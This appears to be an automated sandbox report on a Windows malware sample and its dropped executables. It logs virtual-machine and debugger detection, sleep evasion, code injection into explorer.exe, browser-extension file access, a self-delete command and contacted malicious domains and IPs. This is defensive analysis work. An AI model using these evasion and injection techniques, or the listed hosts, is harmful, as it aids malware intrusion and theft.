                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00406AA0
                      Source: C:\Windows\explorer.exe TID: 6608Thread sleep count: 573 > 30
                      Source: C:\Windows\explorer.exe TID: 6604Thread sleep count: 316 > 30
                      Source: C:\Windows\explorer.exe TID: 6604Thread sleep time: -31600s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 6636Thread sleep count: 376 > 30
                      Source: C:\Windows\explorer.exe TID: 6636Thread sleep time: -37600s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 5640Thread sleep count: 382 > 30
                      Source: C:\Windows\explorer.exe TID: 6296Thread sleep count: 232 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6180Thread sleep time: -210000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\8132.exe TID: 6764Thread sleep count: 43 > 30
                      Source: C:\Users\user\AppData\Local\Temp\9355.exe TID: 6928Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 5468Thread sleep count: 41 > 30
                      Source: C:\Users\user\AppData\Local\Temp\9355.exe TID: 1328Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\9355.exe TID: 3100Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 573
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 376
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 382
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWindow / User API: threadDelayed 531
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWindow / User API: threadDelayed 1133
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00406AA0
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeCode function: 24_2_049DD5F3 str word ptr [ecx-00067B7Bh]
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F338.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dllJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\175C.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FFBD.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\atingifo.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\SysWOW64\tfktmtml\atingifo.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                      Source: explorer.exe, 0000000B.00000000.299391635.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000000B.00000000.313723240.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                      Source: explorer.exe, 0000000B.00000000.299391635.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                      Source: explorer.exe, 0000000B.00000000.323776609.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000014.00000002.411153620.0000024EC7AA7000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWp
                      Source: explorer.exe, 0000000B.00000000.323776609.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                      Source: svchost.exe, 00000003.00000002.550818151.0000022B54402000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 00000014.00000003.410348248.0000024EC7A5A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.411248892.0000024EC7AE8000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.411078995.0000024EC7A5B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: 9355.exeBinary or memory string: d0mVS9XkRiWyXacaxyBS6zJoYofT5ykryAVrO24oEgDz8KzYGifrrLKgvEP1q2peVRljBPpkqpVMci3wmCKIDINhwJhWPxDkU1VzXfycTZzx/319ADPJfxW5cjPRZAgtAA
                      Source: explorer.exe, 0000000B.00000000.299391635.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: svchost.exe, 00000003.00000002.551322633.0000022B5443C000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.551881780.000001F3B863E000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.551431309.000001EA7CA2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 1_2_0041AA4B LoadLibraryA,GetProcAddress,VirtualProtect,
                      Source: C:\Users\user\AppData\Roaming\ahtdegsCode function: 15_2_00935A57 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 16_2_00790042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00A8360F push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 1_2_004258A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 1_2_0041C66F GetTickCount,FreeUserPhysicalPages,GetCalendarInfoA,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,GlobalMemoryStatus,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntA,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeMemory protected: page guard
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 1_2_004258A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 1_2_004286F0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: dodecoin.org
                      Source: C:\Windows\explorer.exeDomain query: bitly.com
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: short.link
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: bit.ly
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: F338.exe.11.drJump to dropped file
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeMemory written: C:\Users\user\AppData\Local\Temp\7085.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeMemory written: C:\Users\user\AppData\Local\Temp\9355.exe base: 400000 value starts with: 4D5A
                      Contains functionality to inject code into remote processesShow sources
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeCode function: 16_2_00790110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeThread created: C:\Windows\explorer.exe EIP: 4DE1930
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeThread created: unknown EIP: 5C11930
                      .NET source code references suspicious native API functionsShow sources
                      Source: 9355.exe.11.dr, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 9355.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 24.0.9355.exe.f0000.2.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 24.0.9355.exe.f0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 24.0.9355.exe.f0000.0.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 24.0.9355.exe.f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 24.0.9355.exe.f0000.1.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 24.0.9355.exe.f0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 24.2.9355.exe.f0000.0.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 24.2.9355.exe.f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 24.0.9355.exe.f0000.3.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 24.0.9355.exe.f0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 35.0.9355.exe.80000.2.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 35.0.9355.exe.80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 35.2.9355.exe.80000.0.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 35.2.9355.exe.80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 35.0.9355.exe.80000.3.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 35.0.9355.exe.80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 35.0.9355.exe.80000.0.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 35.0.9355.exe.80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 35.0.9355.exe.80000.1.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 35.0.9355.exe.80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 43.0.9355.exe.c50000.0.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 43.0.9355.exe.c50000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 43.2.9355.exe.c50000.1.unpack, tnemelEyciloPehcaCptFnoitarugifnoCteNmetsyS36227.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 43.2.9355.exe.c50000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeProcess created: C:\Users\user\Desktop\3YzgU3S0nW.exe "C:\Users\user\Desktop\3YzgU3S0nW.exe"
                      Source: C:\Users\user\AppData\Roaming\ahtdegsProcess created: C:\Users\user\AppData\Roaming\ahtdegs C:\Users\user\AppData\Roaming\ahtdegs
                      Source: C:\Users\user\AppData\Local\Temp\7085.exeProcess created: C:\Users\user\AppData\Local\Temp\7085.exe C:\Users\user\AppData\Local\Temp\7085.exe
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\8132.exe" & exit
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess created: C:\Users\user\AppData\Local\Temp\9355.exe C:\Users\user\AppData\Local\Temp\9355.exe
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeProcess created: C:\Users\user\AppData\Local\Temp\9355.exe C:\Users\user\AppData\Local\Temp\9355.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: svchost.exe, 00000008.00000002.550952570.0000021C32790000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.294826732.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.304771607.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.319949981.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 0000000B.00000000.304579510.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.294608159.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.319509603.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
                      Source: svchost.exe, 00000008.00000002.550952570.0000021C32790000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.309766906.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.294826732.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.304771607.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.319949981.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: svchost.exe, 00000008.00000002.550952570.0000021C32790000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.294826732.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.304771607.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.319949981.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: svchost.exe, 00000008.00000002.550952570.0000021C32790000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.294826732.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.304771607.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.319949981.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 0000000B.00000000.326701558.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.299460907.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.313723240.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,_strncpy_s,__invoke_watson_if_error,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
